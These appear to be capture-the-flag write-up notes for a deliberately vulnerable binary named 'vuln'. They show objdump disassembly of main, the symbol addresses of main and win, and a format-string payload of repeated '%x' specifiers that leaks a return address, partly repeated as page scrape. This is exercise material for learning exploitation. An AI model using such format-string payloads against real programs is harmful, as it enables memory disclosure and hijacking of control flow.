find main layout with `objdump -d --disassemble=main vuln`

0000000000001400 <main>:
    1400:	f3 0f 1e fa          	endbr64
    1404:	55                   	push   %rbp
    1405:	48 89 e5             	mov    %rsp,%rbp
    1408:	48 8d 35 9a fe ff ff 	lea    -0x166(%rip),%rsi        # 12a9 <segfault_handler>
    140f:	bf 0b 00 00 00       	mov    $0xb,%edi
    1414:	e8 57 fd ff ff       	call   1170 <signal@plt>
    1419:	48 8b 05 f0 2b 00 00 	mov    0x2bf0(%rip),%rax        # 4010 <stdout@GLIBC_2.2.5>
    1420:	b9 00 00 00 00       	mov    $0x0,%ecx
    1425:	ba 02 00 00 00       	mov    $0x2,%edx
    142a:	be 00 00 00 00       	mov    $0x0,%esi
    142f:	48 89 c7             	mov    %rax,%rdi
    1432:	e8 49 fd ff ff       	call   1180 <setvbuf@plt>
    1437:	b8 00 00 00 00       	mov    $0x0,%eax
    143c:	e8 86 fe ff ff       	call   12c7 <call_functions>
    1441:	b8 00 00 00 00       	mov    $0x0,%eax
    1446:	5d                   	pop    %rbp
    1447:	c3                   	ret

find `main` and `win` locations

000000000000136a g     F .text	0000000000000096              win
0000000000001400 g     F .text	0000000000000048              main

find buffer offset to read return address into `main` via gdb

%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x.%lx
return value \leftrightarrow *main+65 after dot

1.3 KiB Raw Blame History

find main layout with objdump -d --disassemble=main vuln

find main and win locations

find buffer offset to read return address into main via gdb

1.3 KiB

Raw Blame History

find main layout with `objdump -d --disassemble=main vuln`

find `main` and `win` locations

find buffer offset to read return address into `main` via gdb